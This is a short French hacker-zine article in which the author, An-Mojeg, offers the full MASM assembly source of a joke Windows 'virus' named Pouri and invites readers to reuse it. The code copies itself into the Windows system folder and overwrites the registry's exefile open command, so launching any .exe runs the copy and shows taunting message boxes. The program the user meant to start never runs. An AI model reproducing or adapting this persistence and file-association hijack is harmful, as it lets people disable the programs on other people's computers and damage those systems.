+-----+-------+----------+-------------------------------+
| 001 | virii | An-Mojeg | an-mojeg@mail-developpeur.com |
+-----+-------+----------+-------------------------------+

Virus ? nan ! Pouri ? oui ! oui ! oui !
#######################################

Introduction :
--------------
	Cette article est en fait là pour montrer qu'il existe normalement
dans ce zine une partie Virii (pluriel de virus) mais n'étant pas expert en la matière
j'ai fait un pouri :) je balance tout de suite mes sources (a la corbeille ?)

;=====================================================
; Vous pouvez tout faire de ces sources, dites que c'est vous qui l'avez fait
; je passerait moins pour un con comme ça *lol*
;
;		Pouri v 0.1b
;
.486                  
.model flat, stdcall   
option casemap :none 
	include \masm32\include\windows.inc
	include \masm32\include\user32.inc
	include \masm32\include\kernel32.inc
	include \masm32\include\advapi32.inc

	includelib \masm32\lib\user32.lib
	includelib \masm32\lib\kernel32.lib
	includelib \masm32\lib\ADVAPI32.LIB

szText MACRO Name, Text:VARARG
	LOCAL lbl
	jmp lbl
	Name db Text,0
	lbl:
ENDM

.data
	buffer		db	200 dup(0)
	DwBytes         dd  	12345678H
	pKey		dd	0
	Disp		dd	0
.data?
        hInstance 	dd	?
        hIcon 		dd 	?
	fil		dd	256 dup(?)
.code
start:
	invoke	GetModuleHandle, NULL
	mov 	hInstance, eax

	invoke 	LoadIcon,hInstance,500 
	mov 	hIcon, eax

	szText 	titre, "- Seven SYnKoP Crew - Pouri v0.1b"
	szText 	message, ".:=-( Fichier infecté (mytho!) par le Pouri virus wouwou berk chui méchant ! )-=:."
	szText	nefil, "C:\WINDOWS\SYSTEM\VIRUSLOL.EXE"
	szText  neval, 34,"C:\WINDOWS\SYSTEM\VIRUSLOL.EXE",34," %1",0
	szText	topr, 34,"%s",34," : ce fichier est infecté par ... rien en fait ... c'est pouri voilà tout !",0
	szText	dakey, "exefile\shell\open\command\"
	szText	szREGDWORD, 'REG_DWORD',0

	invoke 	GetModuleFileName,NULL,addr fil,sizeof fil
	invoke 	CopyFile,addr fil,addr nefil,FALSE

	invoke	RegCreateKeyExA, HKEY_CLASSES_ROOT, addr dakey, 0, addr szREGDWORD , 0,KEY_WRITE or KEY_READ, 0, addr pKey, addr Disp
	invoke	RegSetValueExA, pKey, NULL, NULL, REG_SZ, addr neval, sizeof neval
        invoke	RegCloseKey, pKey       

	invoke 	MessageBox,0, addr message, addr titre,0
	
	call	GetCommandLineA
	mov     edi,eax
	add	edi,21h

	invoke	wsprintf, addr buffer, addr topr, edi

	invoke 	MessageBox,0, addr buffer, addr titre,0

	invoke 	ExitProcess,eax
end start
;=====================================================

Conclusion :
------------
	J'ai honte. J'espère que dans le prochain zine l'article virii ne sera pas a jeter.

An-Mojeg		[ an-mojeg@mail-developpeur.com ]